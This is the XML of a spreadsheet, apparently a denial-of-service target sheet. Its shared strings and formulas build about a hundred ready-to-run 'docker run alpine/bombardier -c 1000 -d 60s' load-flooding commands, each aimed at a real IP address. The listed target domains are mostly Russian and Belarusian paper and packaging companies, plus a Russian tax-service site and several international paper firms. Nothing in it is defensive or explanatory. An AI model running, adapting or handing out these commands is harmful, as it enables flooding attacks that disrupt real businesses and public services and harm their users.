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<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" uniqueCount="298">
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 91.217.20.1&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>91.217.20.1</t>
  </si>
  <si>
    <t>arkhbum.com</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 148.251.9.18&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>148.251.9.18</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 23.236.62.147&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>23.236.62.147</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 176.74.216.63&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>176.74.216.63</t>
  </si>
  <si>
    <t>utupack.ru</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 176.74.218.245&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>176.74.218.245</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 176.74.219.91&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>176.74.219.91</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 176.31.3.154&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>176.31.3.154</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 188.138.25.51&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>188.138.25.51</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 136.243.223.232&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>136.243.223.232</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 176.74.222.29&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>176.74.222.29</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 108.162.193.170&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>108.162.193.170</t>
  </si>
  <si>
    <t>rostovbumaga.ru</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 108.162.192.139&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>108.162.192.139</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 172.67.163.236&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>172.67.163.236</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 104.21.66.196&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>104.21.66.196</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 92.127.158.62&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>92.127.158.62</t>
  </si>
  <si>
    <t>sckkbur.ru</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 92.127.158.61&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>92.127.158.61</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 92.127.158.63&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>92.127.158.63</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 91.226.223.50&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>91.226.223.50</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 141.8.192.54&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>141.8.192.54</t>
  </si>
  <si>
    <t>karavaevo.ru</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 172.105.85.119&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>172.105.85.119</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 80.87.203.101&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>80.87.203.101</t>
  </si>
  <si>
    <t>ilimgroup.ru</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 90.156.219.38&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>90.156.219.38</t>
  </si>
  <si>
    <t>sckk.by</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 178.159.243.220&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>178.159.243.220</t>
  </si>
  <si>
    <t>bmik-aquapack.by</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 142.250.27.26&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>142.250.27.26</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 64.233.184.26&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>64.233.184.26</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 209.85.202.27&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>209.85.202.27</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 142.250.153.26&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>142.250.153.26</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 64.233.184.27&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>64.233.184.27</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 142.251.111.26&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>142.251.111.26</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 86.57.246.186&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>86.57.246.186</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 178.159.250.29&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>178.159.250.29</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 178.159.252.109&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>178.159.252.109</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 188.17.150.118&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>188.17.150.118</t>
  </si>
  <si>
    <t>pcbk.ru</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 188.170.119.130&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>188.170.119.130</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 188.170.119.134&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>188.170.119.134</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 188.68.186.14&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>188.68.186.14</t>
  </si>
  <si>
    <t>remos.ru</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 198.185.159.144&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>198.185.159.144</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 46.173.190.195&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>46.173.190.195</t>
  </si>
  <si>
    <t>akarton.ru</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 85.172.11.199&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>85.172.11.199</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 213.24.64.138 &amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t xml:space="preserve">213.24.64.138 </t>
  </si>
  <si>
    <t>lkdr.nalog.gov.ru</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 213.33.55.110&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>213.33.55.110</t>
  </si>
  <si>
    <t>mondigroup.com</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 213.33.55.147&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>213.33.55.147</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 213.33.55.121&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>213.33.55.121</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 213.33.55.108&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>213.33.55.108</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 213.33.55.99&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>213.33.55.99</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 213.33.55.227&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>213.33.55.227</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 213.33.55.144&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>213.33.55.144</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 213.33.55.141&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>213.33.55.141</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 213.33.55.101&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>213.33.55.101</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 213.33.55.236&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>213.33.55.236</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 213.33.55.232&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>213.33.55.232</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 213.33.55.97&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>213.33.55.97</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 213.33.55.204&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>213.33.55.204</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 213.33.55.221&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>213.33.55.221</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 213.33.55.220&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>213.33.55.220</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 213.33.54.8&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>213.33.54.8</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 213.33.55.95&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>213.33.55.95</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 160.109.17.100&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>160.109.17.100</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 197.97.68.205&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>197.97.68.205</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 217.69.139.180&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>217.69.139.180</t>
  </si>
  <si>
    <t>gofrotara54.com</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 216.239.36.101&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>216.239.36.101</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 216.239.38.101&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>216.239.38.101</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 185.230.63.171&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>185.230.63.171</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 185.108.88.100&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>185.108.88.100</t>
  </si>
  <si>
    <t>pkf39.ru</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 185.108.88.102&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>185.108.88.102</t>
  </si>
  <si>
    <t>kbkf.ru</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 37.29.57.18&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>37.29.57.18</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 79.104.53.186&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>79.104.53.186</t>
  </si>
  <si>
    <t>sftgroup.ru</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 90.156.201.21&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>90.156.201.21</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 213.33.160.70&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>213.33.160.70</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 213.33.160.69&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>213.33.160.69</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 192.139.132.28&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>192.139.132.28</t>
  </si>
  <si>
    <t>smurfitkappa.com</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 85.115.60.190&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>85.115.60.190</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 208.87.234.190&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>208.87.234.190</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 85.115.52.190&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>85.115.52.190</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 85.115.54.190&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>85.115.54.190</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 176.97.158.3&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>176.97.158.3</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 176.97.158.1&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>176.97.158.1</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 176.97.158.2&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>176.97.158.2</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 192.174.68.4&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>192.174.68.4</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 192.174.68.1&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>192.174.68.1</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 192.174.68.3&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>192.174.68.3</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 212.108.4.192&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>212.108.4.192</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 212.108.4.216&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>212.108.4.216</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 192.139.132.44&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>192.139.132.44</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 40.91.209.208&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>40.91.209.208</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 212.108.4.185&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>212.108.4.185</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 212.108.4.159&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>212.108.4.159</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 192.139.132.15&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>192.139.132.15</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 192.139.132.10&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>192.139.132.10</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 192.139.132.43&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>192.139.132.43</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 212.108.4.187&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>212.108.4.187</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 63.239.189.56&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>63.239.189.56</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 31.31.194.244&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>31.31.194.244</t>
  </si>
  <si>
    <t>karton-tmb.ru</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 31.31.194.245&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>31.31.194.245</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 31.31.198.181&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>31.31.198.181</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 91.244.169.41&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>91.244.169.41</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 192.46.71.77&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>192.46.71.77</t>
  </si>
  <si>
    <t>storaenso.com</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 92.240.75.40&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>92.240.75.40</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 92.240.75.7&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>92.240.75.7</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 99.131.30.251&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>99.131.30.251</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 91.233.125.10&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>91.233.125.10</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 195.12.228.150&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>195.12.228.150</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 192.46.71.89&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>192.46.71.89</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 192.46.71.82&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>192.46.71.82</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 192.46.71.66&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>192.46.71.66</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 192.46.71.76&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>192.46.71.76</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 137.117.148.100&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>137.117.148.100</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 192.46.71.229&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>192.46.71.229</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 192.46.71.232&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>192.46.71.232</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 192.130.248.66&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>192.130.248.66</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 192.46.71.194&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>192.46.71.194</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 192.46.71.198&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>192.46.71.198</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 192.46.71.199&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>192.46.71.199</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 192.46.71.160&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>192.46.71.160</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 192.46.71.201&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>192.46.71.201</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 192.46.71.204&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>192.46.71.204</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 194.251.98.6&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>194.251.98.6</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 137.116.194.239&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>137.116.194.239</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 179.191.85.150&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>179.191.85.150</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 192.46.71.237&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>192.46.71.237</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 192.130.248.77&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>192.130.248.77</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 192.130.248.74&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>192.130.248.74</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 192.130.248.72&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>192.130.248.72</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 192.46.71.73&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>192.46.71.73</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 192.46.71.210&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>192.46.71.210</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 178.210.81.10&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>178.210.81.10</t>
  </si>
  <si>
    <t>proletariy.ru</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 178.210.92.7&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>178.210.92.7</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 193.232.146.1&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>193.232.146.1</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 193.232.146.244&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>193.232.146.244</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 90.154.48.227&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>90.154.48.227</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 193.232.130.14&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>193.232.130.14</t>
  </si>
  <si>
    <t>gofromaster.ru</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 194.226.96.8&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>194.226.96.8</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 194.85.61.20&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>194.85.61.20</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 91.189.114.19&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>91.189.114.19</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 91.189.116.13&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>91.189.116.13</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 91.189.116.14&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>91.189.116.14</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 91.189.116.16&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>91.189.116.16</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 92.53.96.153&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>92.53.96.153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</si>
</sst>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36"/>
  <sheetViews>
    <sheetView workbookViewId="0" showGridLines="0" defaultGridColor="1"/>
  </sheetViews>
  <sheetFormatPr defaultColWidth="11.3333" defaultRowHeight="15.75" customHeight="1" outlineLevelRow="0" outlineLevelCol="0"/>
  <cols>
    <col min="1" max="1" width="76.8516" style="1" customWidth="1"/>
    <col min="2" max="2" width="14.8516" style="1" customWidth="1"/>
    <col min="3" max="3" width="45.3516" style="1" customWidth="1"/>
    <col min="4" max="5" width="11.3516" style="1" customWidth="1"/>
    <col min="6" max="16384" width="11.3516" style="1" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="1" ht="15.35" customHeight="1">
      <c r="A1" t="s" s="2">
        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B1&amp;"&amp;&amp; sleep 5;"</f>
        <v>0</v>
      </c>
      <c r="B1" t="s" s="2">
        <v>1</v>
      </c>
      <c r="C1" t="s" s="2">
        <v>2</v>
      </c>
      <c r="D1" s="2"/>
      <c r="E1" s="3"/>
    </row>
    <row r="2" ht="15.35" customHeight="1">
      <c r="A2" t="s" s="2">
        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B2&amp;"&amp;&amp; sleep 5;"</f>
        <v>3</v>
      </c>
      <c r="B2" t="s" s="2">
        <v>4</v>
      </c>
      <c r="C2" t="s" s="2">
        <v>2</v>
      </c>
      <c r="D2" s="2"/>
      <c r="E2" s="3"/>
    </row>
    <row r="3" ht="15.35" customHeight="1">
      <c r="A3" t="s" s="2">
        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B3&amp;"&amp;&amp; sleep 5;"</f>
        <v>5</v>
      </c>
      <c r="B3" t="s" s="2">
        <v>6</v>
      </c>
      <c r="C3" t="s" s="2">
        <v>2</v>
      </c>
      <c r="D3" s="4"/>
      <c r="E3" s="3"/>
    </row>
    <row r="4" ht="15.35" customHeight="1">
      <c r="A4" t="s" s="2">
        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B4&amp;"&amp;&amp; sleep 5;"</f>
        <v>7</v>
      </c>
      <c r="B4" t="s" s="2">
        <v>8</v>
      </c>
      <c r="C4" t="s" s="2">
        <v>9</v>
      </c>
      <c r="D4" s="5"/>
      <c r="E4" s="3"/>
    </row>
    <row r="5" ht="15.35" customHeight="1">
      <c r="A5" t="s" s="2">
        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B5&amp;"&amp;&amp; sleep 5;"</f>
        <v>10</v>
      </c>
      <c r="B5" t="s" s="2">
        <v>11</v>
      </c>
      <c r="C5" t="s" s="2">
        <v>9</v>
      </c>
      <c r="D5" s="2"/>
      <c r="E5" s="3"/>
    </row>
